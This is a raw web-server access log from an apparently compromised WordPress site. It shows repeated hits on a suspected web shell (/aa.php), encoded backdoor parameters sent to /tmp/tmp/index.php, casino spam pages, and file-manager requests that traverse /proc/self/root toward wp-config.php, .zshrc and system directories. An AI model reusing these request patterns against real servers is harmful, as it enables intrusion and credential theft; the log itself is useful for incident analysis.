199.188.200.18 - - [01/Nov/2025:08:45:53 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343735332p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030313135332q6531623738353031303464333962363934663434636538366466346463386363222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
36.85.79.74 - - [01/Nov/2025:08:50:51 -0400] "GET /aa.php HTTP/1.1" 200 70989 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:50:52 -0400] "GET /q-~38SMd5jcbweNrkTIPI0rEfWBJZrP6Phm27291/?path=/home/creaqbdc/public_html/wp-includes/blocks HTTP/1.1" 200 7721 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.223 - - [01/Nov/2025:08:50:52 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous HTTP/1.1" 200 13355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
35.172.125.172 - - [01/Nov/2025:08:50:52 -0400] "GET /?path=//proc/self/root/lib/locale/en_GB/LC_MESSAGES HTTP/1.1" 200 3389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:50:52 -0400] "GET /q-~229fLazRfqLTBnnZW0jJbbuHEmdPl2f1N1354/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:50:54 -0400] "GET /free-spins-coin/ HTTP/1.1" 200 18719 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.85.79.74 - - [01/Nov/2025:08:50:53 -0400] "GET /aa.php HTTP/1.1" 200 70998 "-" "-"
98.98.9.44 - - [01/Nov/2025:08:50:54 -0400] "POST /xmlrpc.php HTTP/1.1" 200 70998 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:50:55 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~189Au6R8WCqGKYg1UFxRBOtGIaSKmQjAY49720/ HTTP/1.1" 200 20968 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.85.79.74 - - [01/Nov/2025:08:50:56 -0400] "GET /aa.php HTTP/1.1" 200 70990 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:50:57 -0400] "GET /q-~60ilN1RUs2f8suOGayXCrybBXvnCGUTc39659/ HTTP/1.1" 200 4149 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:50:58 -0400] "GET /aa.php HTTP/1.1" 200 70990 "-" "-"
23.21.225.190 - - [01/Nov/2025:08:50:58 -0400] "GET /services/custom-renovations/?path=//proc/self/root/proc/self/root/proc/thread-self/root/home8 HTTP/1.1" 200 3090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
36.85.79.74 - - [01/Nov/2025:08:51:00 -0400] "GET /aa.php HTTP/1.1" 200 70997 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:51:01 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~11YnDSulLc0HjEjzBJbQFYaWNIF4oSlV9304/ HTTP/1.1" 200 18750 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.199 - - [01/Nov/2025:08:51:00 -0400] "GET /q-~39TdaqmtEVBLnqggOyUyIpdfKwASn07E344/?fileloc=/home/creaqbdc/public_html/wp-includes/template-loader.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 3647 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
34.195.60.66 - - [01/Nov/2025:08:51:00 -0400] "GET /das-beste-world-wide-web-spielbank-via-herumtoben-vortragen/?path=//usr/share/perl5/vendor_perl/Net/SNMP/Transport/IPv6 HTTP/1.1" 200 3483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:51:02 -0400] "GET /q-~154N6pzGTtsmDKrIn5naDmrlsPxVpeHxq38761/?fileloc=/home/creaqbdc/public_html/wp-config.php&path=/home/creaqbdc/public_html HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:51:01 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/hc_python HTTP/1.1" 200 3109 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:51:01 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents%2FSaveButton.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents HTTP/1.1" 200 3197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:01 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FProfiler%2FProfilerStorageInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FProfiler HTTP/1.1" 200 3109 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:01 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FProcess%2FException%2FExceptionInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FProcess%2FException HTTP/1.1" 200 2773 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:01 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FBundle%2FBundle.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FBundle HTTP/1.1" 200 4211 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:01 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent%2FFilterResponseEvent.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent HTTP/1.1" 200 3080 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:02 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent%2FPostResponseEvent.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent HTTP/1.1" 200 3057 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:02 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FLoader%2FPhpFileLoader.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FLoader HTTP/1.1" 200 3169 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:02 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FProcess%2FException%2FProcessTimedOutException.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FProcess%2FException HTTP/1.1" 200 3170 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:51:02 -0400] "GET /aa.php HTTP/1.1" 200 70989 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:51:03 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FLoader%2FXmlFileLoader.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FLoader HTTP/1.1" 200 6476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:02 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FLoader%2FIniFileLoader.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FLoader HTTP/1.1" 200 3254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:02 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FMapping%2FClassMetadataFactory.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FMapping HTTP/1.1" 200 3523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:03 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent%2FGetResponseEvent.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent HTTP/1.1" 200 3072 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:04 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FNormalizer%2FCustomNormalizer.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FNormalizer HTTP/1.1" 200 3143 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.223.181.32 - - [01/Nov/2025:08:51:04 -0400] "GET /blogs/?path=//lib64/perl5/vendor_perl/auto/Compress/Bzip2 HTTP/1.1" 200 3474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:51:05 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FConfig%2FFileLocator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FConfig HTTP/1.1" 200 3120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:05 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FJsonEncoder.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 3120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:04 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent%2FFinishRequestEvent.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent HTTP/1.1" 200 2790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:04 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FXmlEncoder.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 5984 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:05 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FBundle%2FBundleInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FBundle HTTP/1.1" 200 3219 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:51:06 -0400] "GET /q-~38sF5wN0HWyZsIwovOrOEC8hYdcQRpHC12593/ HTTP/1.1" 200 4131 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:51:06 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fvue%2Fvue.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fvue HTTP/1.1" 200 3419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.198 - - [01/Nov/2025:08:51:06 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~290ye8CaHoKpdOZF2HGqRrpWjqPcRK34n5091/ HTTP/1.1" 200 4143 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.198 - - [01/Nov/2025:08:51:07 -0400] "GET /m001005289?srsltid=AfmBOockRHcvNzfzM69vNg_HswuteLdpl_fZt07S6w-W-OF4dKuh6Z HTTP/1.1" 200 17920 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:51:07 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FChainEncoder.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 3399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:07 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FChainDecoder.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 3286 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:51:07 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fclojure%2Fclojure.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fclojure HTTP/1.1" 200 8094 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:51:09 -0400] "GET /aa.php HTTP/1.1" 200 70998 "-" "-"
199.188.200.18 - - [01/Nov/2025:08:46:13 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343737332p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030313137332q3165663162333634643139636363373139346637393639653031343637393962222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
54.235.172.96 - - [01/Nov/2025:08:51:09 -0400] "GET /portfolio-commercial/?path=//proc/self/root/lib/locale/en_BW/LC_MESSAGES HTTP/1.1" 200 3389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:51:09 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fverilog%2Fverilog.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fverilog HTTP/1.1" 200 8347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:51:12 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~92jCJmVUk1kDTorofNoEfPFryjqaSH5c26121/ HTTP/1.1" 200 18727 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:51:09 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent%2FKernelEvent.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent HTTP/1.1" 200 3200 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:51:12 -0400] "GET /no-deposit-bonus-codes-for-real-money-casinos/ HTTP/1.1" 200 18690 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:51:09 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder%2FSerializerAwareEncoder.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FSerializer%2FEncoder HTTP/1.1" 200 2861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.223 - - [01/Nov/2025:08:51:11 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-libicu/lib HTTP/1.1" 200 3227 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:51:13 -0400] "GET /aa.php HTTP/1.1" 200 70998 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:51:14 -0400] "GET /?m017040883?srsltid=AfmBOoesXcTwXqti9YtLR9_fc52IKjgjd_xnhXmECE-K-pLbzmz6LC HTTP/1.1" 200 21185 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
3.212.86.97 - - [01/Nov/2025:08:51:13 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//usr/lib/dracut/dracut-initramfs-restore&path=//usr/lib/dracut HTTP/1.1" 200 3716 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:51:15 -0400] "GET /q-~105pcY3RgoKzsFDzieyZtWOZt9oIKzq7i4482/?fileloc=/home/creaqbdc/public_html/wp-load.php&path=/home/creaqbdc/public_html HTTP/1.1" 200 4222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:51:16 -0400] "GET /aa.php HTTP/1.1" 200 70998 "-" "-"
44.194.134.53 - - [01/Nov/2025:08:51:16 -0400] "GET /portfolio-commercial?path=//opt/imunify360/venv/lib64/python3.11/site-packages/defence360agent/simple_rpc HTTP/1.1" 200 4209 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:51:18 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~200YU3h6OboaPtjXvXT5aoAFJ6VyKHkEb16889/ HTTP/1.1" 200 18743 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.85.79.74 - - [01/Nov/2025:08:51:18 -0400] "GET /aa.php HTTP/1.1" 200 70997 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:51:19 -0400] "GET /q-~108sUXlEJRhuLtYIKEHSGG2XYRmd5eNFs21945/?path=/home/creaqbdc/public_html/creativefinishings.com HTTP/1.1" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:51:20 -0400] "GET /aa.php HTTP/1.1" 200 70990 "-" "-"
34.227.156.153 - - [01/Nov/2025:08:51:21 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?fileloc=//home/creaqbdc/.zshrc&path=//home/creaqbdc HTTP/1.1" 200 3343 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:51:22 -0400] "GET /?path=//proc/self/root/proc/2966092/root/etc/cl.python HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:51:22 -0400] "GET /aa.php HTTP/1.1" 200 70997 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:51:22 -0400] "GET /q-~60ilN1RUs2f8suOGayXCrybBXvnCGUTc39659/?fileloc=/home/creaqbdc/public_html/wp-links-opml.php&path=/home/creaqbdc/public_html HTTP/1.1" 200 3606 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
